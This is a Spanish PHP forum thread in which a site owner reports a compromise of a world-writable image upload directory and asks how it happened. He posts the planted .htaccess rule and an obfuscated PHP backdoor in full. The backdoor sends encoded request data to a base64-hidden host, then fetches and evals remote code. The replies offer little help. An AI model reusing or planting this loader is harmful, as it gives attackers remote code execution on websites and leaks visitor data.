Foros del Web » Programando para Internet » PHP »

Archivo sospechoso

 Estas en el tema de Archivo sospechoso en el foro de PHP en Foros del Web. Justo coincide que me mude a otro servidor por lo cual tenia todos los archivos con la misma fecha por lo que rapidamente vi 2 ...
  #1 (permalink)  
Antiguo 04/07/2009, 20:23
 
Fecha de Ingreso: noviembre-2003
Mensajes: 24
Antigüedad: 20 años, 5 meses
Puntos: 0
Archivo sospechoso
Justo coincide que me mude a otro servidor por lo cual tenia todos los archivos con la misma fecha por lo que rapidamente vi 2 archivos raros en 1 directorio donde deberia haber solo imagenes.
Lamentablemente en este servidor para que los usuarios pueden subir imagenes tengo que tener el directorio con 777 .

Lo que encontre fue lo siguiente
en el .HTACCESS
Options -MultiViews
ErrorDocument 404 //imgautos/122343.php

y 122343.php

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".bas e64_encode($c).".".base64_encode($d).".".base64_en code($e).".".base64_encode($f).".".base64_encode($ g).".".base64_encode($h).".e.".base64_encode($i)." .".base64_encode($j);$f=base64_decode("cnNzbmV3cy5 3cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="96714f1384775358ccc69f88c90978da") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f. $z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzc u").$f.$z))eval($c);else{$cu=curl_init(base64_deco de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close ($cu);eval($o);};die(); ?>


Estube leyendo algo y parece que envia informacion a un site ruso, ahora desabilite el directorio y solo puse con 755 no sube nadie nada, y borro el archivo y corregi el httaccess.

Ahora como puede haber pasado si mi script no permite subir archivos php ?
Lamentablemente no tengo el acceso raw para ver por donde entraron.
Ahora si ya lo habilite para que se grabe y guarde.

Alguna ayuda por favor para corregir esto.
  #2 (permalink)  
Antiguo 12/09/2009, 16:07
Avatar de mortiprogramador
Colaborador
  
Fecha de Ingreso: septiembre-2009
Ubicación: mortuoria
Mensajes: 3.805
Antigüedad: 14 años, 7 meses
Puntos: 214
Respuesta: Archivo sospechoso
Hola
Ya preguntaste en el hosting acerca de este tema?
  #3 (permalink)  
Antiguo 21/09/2009, 18:40
 
Fecha de Ingreso: noviembre-2003
Mensajes: 24
Antigüedad: 20 años, 5 meses
Puntos: 0
Respuesta: Archivo sospechoso
El hosting che echa fli de una, es tu responsabilidad por programar en php

jeje
igual modifique un script que subia archivos y por ahora no aparecio mas.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 17:13.